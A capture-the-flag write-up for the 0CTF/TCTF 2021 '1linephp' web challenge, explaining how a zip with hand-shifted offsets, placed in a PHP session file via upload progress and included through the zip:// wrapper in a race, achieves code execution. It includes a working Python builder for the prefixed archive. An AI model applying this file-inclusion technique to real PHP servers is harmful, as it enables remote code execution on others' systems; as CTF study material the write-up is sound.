as3617

0CTF/TCTF 2021 Quals - 1linephp [web]

Description

http://111.186.59.2:50080
http://111.186.59.2:50081
http://111.186.59.2:50082
The three servers are the same; you can choose any one. The server will be reset every 10 minutes.


This challenge is almost the same as Orange's HITCON CTF 2018 "One Line PHP Challenge": https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html


<?php
($_=@$_GET['yxxx'].'.php') && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.html');


But some of the code is different, so we need to find a new exploit. This version appends .php to the yxxx parameter, reads that path with file() (which accepts stream wrappers), and only includes it if the first six bytes of the first line are exactly '@<?php'; otherwise it shows the source and phpinfo.

As in the HITCON challenge, we can write arbitrary content into a session file using PHP_SESSION_UPLOAD_PROGRESS and include that session file through various wrappers. But in this challenge we also need to get past the appended .php, so we can imagine two ways to bypass it:


1. phar wrapper
2. zip wrapper

First I tried the phar wrapper, but it's impossible here!

https://stackoverflow.com/questions/59302726/include-php-phar-without-phar-extension

Then maybe we can use the second way for the exploit.

https://github.com/p4-team/ctf/tree/master/2016-04-15-plaid-ctf/web_pixelshop
By accident I found this writeup, and it has very useful information.

A zip file is not required to start with the PK signature. If the offsets stored inside the zip are correct, the archive does not have to begin at the start of the file, and we can simply calculate the ZIP offsets by hand. Zip readers locate the End of Central Directory Record by scanning backwards from the end of the file, and everything else is found through the offsets recorded there and in the central directory.


We need to change two offsets in the zip: the Local Header Offset in the Central Directory File Header, and the Central Directory Offset in the End of Central Directory Record.

Both offsets are measured from the beginning of the file, not from the beginning of the archive. So if we add the length of the session prefix (everything the session handler writes before our zip bytes) to both of them, the wrapper can unzip our payload independent of the session prefix.
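To make the offset fix concrete, here is a small Python script added for this writeup (it is not the exploit from the gist and not the challenge's code). It builds a stored zip with a single a.php entry whose first line starts with '@<?php', adds the length of an arbitrary prefix to the two offsets, and then checks the result with a parser that trusts only the stored offsets. The prefix bytes are constructed for the example; the real prefix is whatever the session handler writes before the archive. The /tmp/sess_ path in include_path assumes the default session.save_path.

```python
import io
import struct
import zipfile
import zlib

ENTRY_NAME = "a.php"
# The entry must satisfy substr(file($_)[0],0,6) === '@<?php'.
ENTRY_DATA = b"@<?php echo 'hello from the zip entry'; ?>\n"
# Constructed stand-in for the bytes a session file carries before the archive.
SESSION_PREFIX = b"constructed-session-prefix|"


def build_stored_zip(name: str, data: bytes) -> bytes:
    """Ordinary zip (method 0 = stored) with one entry; offsets are archive-relative."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def shift_zip_offsets(zip_bytes: bytes, shift: int) -> bytes:
    """Add `shift` to every Local Header Offset in the central directory and to the
    Central Directory Offset in the EOCD, so the archive is valid after `shift`
    bytes of arbitrary prefix are placed in front of it."""
    buf = bytearray(zip_bytes)
    eocd = buf.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no End of Central Directory record")
    # EOCD: sig(4) disk(2) cd_disk(2) n_disk(2) n_total(2) cd_size(4) cd_offset(4) comment_len(2)
    n_entries, _cd_size, cd_offset = struct.unpack_from("<HII", buf, eocd + 10)
    pos = cd_offset
    for _ in range(n_entries):
        if buf[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("bad Central Directory File Header")
        # CDFH: name_len@28 extra_len@30 comment_len@32 ... local_header_offset@42
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        (local_off,) = struct.unpack_from("<I", buf, pos + 42)
        struct.pack_into("<I", buf, pos + 42, local_off + shift)
        pos += 46 + name_len + extra_len + comment_len
    struct.pack_into("<I", buf, eocd + 16, cd_offset + shift)
    return bytes(buf)


def make_prefixed_archive(prefix: bytes, name: str, data: bytes) -> bytes:
    """Prefix + zip whose offsets already account for the prefix."""
    return prefix + shift_zip_offsets(build_stored_zip(name, data), len(prefix))


def read_entry_absolute(blob: bytes, wanted: str) -> bytes:
    """Parse using ONLY the stored offsets (absolute from file start), so this
    fails loudly if they were left relative to the archive instead of the file."""
    eocd = blob.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no End of Central Directory record")
    n_entries, _cd_size, cd_offset = struct.unpack_from("<HII", blob, eocd + 10)
    pos = cd_offset
    for _ in range(n_entries):
        if blob[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("central directory offset does not point at a CDFH")
        (method,) = struct.unpack_from("<H", blob, pos + 10)
        crc, csize, _usize = struct.unpack_from("<III", blob, pos + 16)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", blob, pos + 28)
        (local_off,) = struct.unpack_from("<I", blob, pos + 42)
        name = blob[pos + 46:pos + 46 + name_len].decode()
        pos += 46 + name_len + extra_len + comment_len
        if name != wanted:
            continue
        if blob[local_off:local_off + 4] != b"PK\x03\x04":
            raise ValueError("local header offset does not point at a local file header")
        # Local header: name_len@26 extra_len@28, then name, extra, file data.
        lname_len, lextra_len = struct.unpack_from("<HH", blob, local_off + 26)
        start = local_off + 30 + lname_len + lextra_len
        raw = blob[start:start + csize]
        data = raw if method == 0 else zlib.decompress(raw, -15)
        if zlib.crc32(data) & 0xFFFFFFFF != crc:
            raise ValueError("CRC mismatch")
        return data
    raise KeyError(wanted)


def passes_challenge_check(php_source: bytes) -> bool:
    """Mirror of substr(file($_)[0],0,6) === '@<?php': first line, first 6 bytes."""
    return php_source.split(b"\n", 1)[0][:6] == b"@<?php"


def include_path(sess_id: str, entry: str = ENTRY_NAME) -> str:
    """Value for ?yxxx= ; the challenge appends '.php' itself, and '#' is sent as
    %23 so it reaches PHP. Assumes the default /tmp/sess_<id> session file path."""
    if not entry.endswith(".php"):
        raise ValueError("the entry name must end in .php after the challenge appends it")
    return f"zip:///tmp/sess_{sess_id}%23{entry[:-4]}"


if __name__ == "__main__":
    blob = make_prefixed_archive(SESSION_PREFIX, ENTRY_NAME, ENTRY_DATA)
    print("starts with PK:", blob.startswith(b"PK"))
    print("entry passes check:", passes_challenge_check(read_entry_absolute(blob, ENTRY_NAME)))
    print("include via:", include_path("0123456789abcdef"))
```

Note that Python's own zipfile module quietly compensates for data in front of an archive, so it would read even the unpatched version; the hand-written reader above is what shows that the two offsets really are absolute.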


On the server session.upload_progress.cleanup is enabled, so the upload-progress data (and our archive with it) is removed from the session file as soon as the upload finishes. We therefore need a race condition: keep the upload running while repeatedly requesting the include, so that one request reads the session file while the archive is still inside it.

Then we can get the flag!

My exploit :

https://gist.github.com/as3617/50d598ede736d81bc57804e4d19700e5